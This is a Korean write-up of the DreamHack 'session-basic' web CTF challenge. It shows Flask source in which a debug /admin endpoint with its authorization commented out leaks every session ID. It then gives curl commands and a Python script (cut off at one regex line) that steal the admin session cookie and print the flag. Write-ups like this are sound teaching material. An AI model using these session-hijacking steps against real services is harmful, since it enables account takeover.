[⭐⭐⭐⭐] 디버그 엔드포인트가 세션 전체를 토해낸다 — DreamHack session-basic 풀이

문제: DreamHack — session-basic 분류: Web 난이도: ⭐⭐⭐⭐ Level 4 FLAG: DH{8f3d86d1134c26fedf7c4c3ecd563aae3da98d5c}

문제 개요

쿠키와 세션으로 인증 상태를 관리하는 간단한 로그인 서비스. admin 계정의 비밀번호가 FLAG이기 때문에 직접 로그인은 불가능하지만, 서버 부팅 시 admin 세션이 미리 생성돼 session_storage에 들어간다. 문제 풀이의 핵심은 그 sessionid를 어떻게 빼내느냐다.

🔬 분석

Step 1 — 메인 페이지 및 로그인 폼 확인

배포 서버에 접속하면 단순한 인덱스 페이지와 로그인 폼이 보인다.

guest:guest로 우선 정상 동작을 확인해보면, 세션이 발급되고 Hello guest, you are not admin 메시지가 출력된다.

Step 2 — 소스코드 핵심 부분

users = {
    'guest': 'guest',
    'user': 'user1234',
    'admin': FLAG          # admin의 비밀번호 = 플래그 본문
}
 
session_storage = {}
 
@app.route('/')
def index():
    session_id = request.cookies.get('sessionid', None)
    try:
        username = session_storage[session_id]
    except KeyError:
        return render_template('index.html')
    return render_template('index.html',
        text=f'Hello {username}, {"flag is " + FLAG if username == "admin" else "you are not admin"}')

/ 에서는 쿠키의 sessionid를 키로 session_storage를 조회해 username을 가져오고, admin이면 플래그를 출력한다. 평범한 세션 인증 로직.

문제는 admin의 password가 곧 FLAG라는 점. brute force도 사실상 불가능. 그런데 서버 부팅부에 흥미로운 코드가 있다.

if __name__ == '__main__':
    import os
    # create admin sessionid and save it to our storage
    # and also you cannot reveal admin's sesseionid by brute forcing!!! haha
    session_storage[os.urandom(32).hex()] = 'admin'
    print(session_storage)
    app.run(host='0.0.0.0', port=8000)

서버가 시작될 때 admin 세션이 자동으로 만들어지고, 256비트 랜덤 sessionid가 session_storage에 박혀 있다. brute force는 불가능 — "haha"라는 주석이 그걸 비웃고 있다.

Step 3 — 진짜 취약 지점: /admin 엔드포인트

@app.route('/admin')
def admin():
    # developer's note: review below commented code and uncomment it (TODO)
 
    #session_id = request.cookies.get('sessionid', None)
    #username = session_storage[session_id]
    #if username != 'admin':
    #    return render_template('index.html')
 
    return session_storage

개발자의 TODO 주석이 자랑스럽게 박혀 있다. 권한 검사 코드가 통째로 주석 처리돼 있고, 그 아래에서 session_storage 딕셔너리를 그대로 반환한다. Flask는 dict 반환 시 자동으로 JSON으로 직렬화해서 응답한다.

즉, /admin 에 GET 한 방이면 admin sessionid를 포함한 전체 세션 테이블이 평문으로 노출된다.

💣 핵심 취약점

미사용/주석 처리된 디버그 엔드포인트 노출 (Information Disclosure)

• 개발 중에는 디버깅용으로 모든 세션 상태를 출력하는 게 편하지만, 운영 빌드까지 그대로 살아남으면 곧 인증 우회 수단이 된다.
• sessionid는 충분히 랜덤(256비트)해도, 저장소 자체가 노출되면 엔트로피는 의미가 없다.
• 한 줄짜리 권한 검사를 깜빡한 결과, brute force가 불가능했던 admin 세션이 통째로 새어 나간다.

🎯 풀이

순서는 매우 단순하다.

1. GET /admin → session_storage JSON에서 value가 "admin"인 key 추출
2. 그 key를 sessionid 쿠키로 세팅
3. GET / → admin으로 인식되며 플래그 본문 출력

Step 1 — admin sessionid 탈취

curl -s http://host8.dreamhack.games:8412/admin

응답:

{"a4d41ea66c223587365ba7490b07ee690a79ff8f20d26ba68f4c263a6e25515a":"admin"}

깔끔하게 admin sessionid가 노출된다.

Step 2 — sessionid를 쿠키로 박고 / 호출

curl -s -b "sessionid=a4d41ea66c223587365ba7490b07ee690a79ff8f20d26ba68f4c263a6e25515a" \
     http://host8.dreamhack.games:8412/

응답 HTML 안에 Hello admin, flag is DH{...} 가 박혀 있다.

🚀 Full Exploit

import requests, re
 
BASE = "http://host8.dreamhack.games:8412"
 
# 1. /admin endpoint leaks the entire session_storage
leaked = requests.get(f"{BASE}/admin").json()
admin_sid = next(sid for sid, user in leaked.items() if user == "admin")
print(f"[+] admin sessionid: {admin_sid}")
 
# 2. Use the stolen sessionid as cookie
r = requests.get(f"{BASE}/", cookies={"sessionid": admin_sid})
flag = re.search(r"DH\{[

실행 결과:

[+] admin sessionid: a4d41ea66c223587365ba7490b07ee690a79ff8f20d26ba68f4c263a6e25515a
[+] FLAG: DH{8f3d86d1134c26fedf7c4c3ecd563aae3da98d5c}

📝 결론

디버그 엔드포인트는 운영 빌드에 절대 남기지 말 것 — 가장 흔하면서도 가장 치명적인 정보 노출 패턴이다. TODO 주석은 잊혀지고, 권한 체크는 영원히 commented-out 상태로 살아남는다. 코드 리뷰에서 "주석 처리된 인증 로직"이 보이면 그 PR은 반려 대상이다.

저장소 노출은 엔트로피를 무력화한다 — os.urandom(32)로 256비트 sessionid를 발급해도, 그 저장소 자체를 통째로 보여주는 엔드포인트가 있으면 brute force 난이도는 0이 된다. "추측 불가"는 추측이 시도조차 필요 없을 때 의미가 있다.

Flask return dict 의 자동 JSON 직렬화 함정 — 디버깅 중 무심코 return some_dict 라고 쓰면 Flask가 친절하게 JSON으로 만들어 응답한다. 편리하지만, 그 dict가 민감 정보면 그대로 외부에 노출된다는 뜻이기도 하다.